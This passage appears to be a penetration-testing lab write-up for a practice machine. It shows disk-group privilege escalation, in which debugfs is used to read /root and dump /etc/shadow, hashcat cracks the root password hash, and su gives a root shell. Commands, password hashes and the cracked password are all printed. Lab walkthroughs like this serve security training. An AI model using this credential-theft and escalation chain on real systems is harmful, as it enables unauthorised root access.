Disk Group
The dora user being part of the disk group makes it a vector for privilege escalation
dora@dora:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 947M 0 947M 0% /dev
tmpfs 199M 1.2M 198M 1% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 5.1G 4.3G 55% /
tmpfs 992M 0 992M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1611
/dev/loop1 64M 64M 0 100% /snap/core20/1852
/dev/loop2 92M 92M 0 100% /snap/lxd/24061
/dev/loop3 68M 68M 0 100% /snap/lxd/22753
/dev/sda2 1.7G 209M 1.4G 13% /boot
/dev/loop4 50M 50M 0 100% /snap/snapd/18596
tmpfs 199M 0 199M 0% /run/user/1000/dev/mapper/ubuntu--vg-ubuntu--lv is mounted to /
dora@dora:~$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: cd /root
debugfs: ls
131076 (12) . 2 (12) .. 265478 (12) .ssh 265574 (12) snap
131077 (16) .bashrc 131078 (16) .profile 142303 (24) .bash_history
265709 (16) .cache 265469 (36) .local 132363 (20) proof.txt
132531 (3908) flag4.txt
(END)I can read any file on the target system
debugfs: cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::
daemon:*:19235:0:99999:7:::
bin:*:19235:0:99999:7:::
sys:*:19235:0:99999:7:::
sync:*:19235:0:99999:7:::
games:*:19235:0:99999:7:::
man:*:19235:0:99999:7:::
lp:*:19235:0:99999:7:::
mail:*:19235:0:99999:7:::
news:*:19235:0:99999:7:::
uucp:*:19235:0:99999:7:::
proxy:*:19235:0:99999:7:::
www-data:*:19235:0:99999:7:::
backup:*:19235:0:99999:7:::
list:*:19235:0:99999:7:::
irc:*:19235:0:99999:7:::
gnats:*:19235:0:99999:7:::
nobody:*:19235:0:99999:7:::
systemd-network:*:19235:0:99999:7:::
systemd-resolve:*:19235:0:99999:7:::
systemd-timesync:*:19235:0:99999:7:::
messagebus:*:19235:0:99999:7:::
syslog:*:19235:0:99999:7:::
_apt:*:19235:0:99999:7:::
tss:*:19235:0:99999:7:::
uuidd:*:19235:0:99999:7:::
tcpdump:*:19235:0:99999:7:::
landscape:*:19235:0:99999:7:::
pollinate:*:19235:0:99999:7:::
usbmux:*:19381:0:99999:7:::
sshd:*:19381:0:99999:7:::
systemd-coredump:!!:19381::::::
lxd:!:19381::::::
fwupd-refresh:*:19381:0:99999:7:::
dora:$6$PkzB/mtNayFM5eVp$b6LU19HBQaOqbTehc6/LEk8DC2NegpqftuDDAvOK20c6yf3dFo0esC0vOoNWHqvzF0aEb3jxk39sQ/S4vGoGm/:19453:0:99999:7:::Including the /etc/shadow file
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat --show root.hash
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat -a 0 -m 1800 root.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:explorer
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhD...0sZiC.
Time.Started.....: Wed Mar 26 11:41:18 2025 (1 sec)
Time.Estimated...: Wed Mar 26 11:41:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3416 H/s (6.90ms) @ Accel:128 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3200/14344385 (0.02%)
Rejected.........: 0/3200 (0.00%)
Restore.Point....: 3072/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4096-5000
Candidate.Engine.: Device Generator
Candidates.#1....: adriano -> imissu
Hardware.Mon.#1..: Util: 72%
Started: Wed Mar 26 11:41:17 2025
Stopped: Wed Mar 26 11:41:21 2025Password hash cracked for the root account; explorer
root
dora@dora:/$ su root
Password: explorer
root@dora:/# whoami
root
root@dora:/# hostname
dora
root@dora:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:ac:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.111.16/24 brd 192.168.111.255 scope global ens160
valid_lft forever preferred_lft foreverSystem level compromise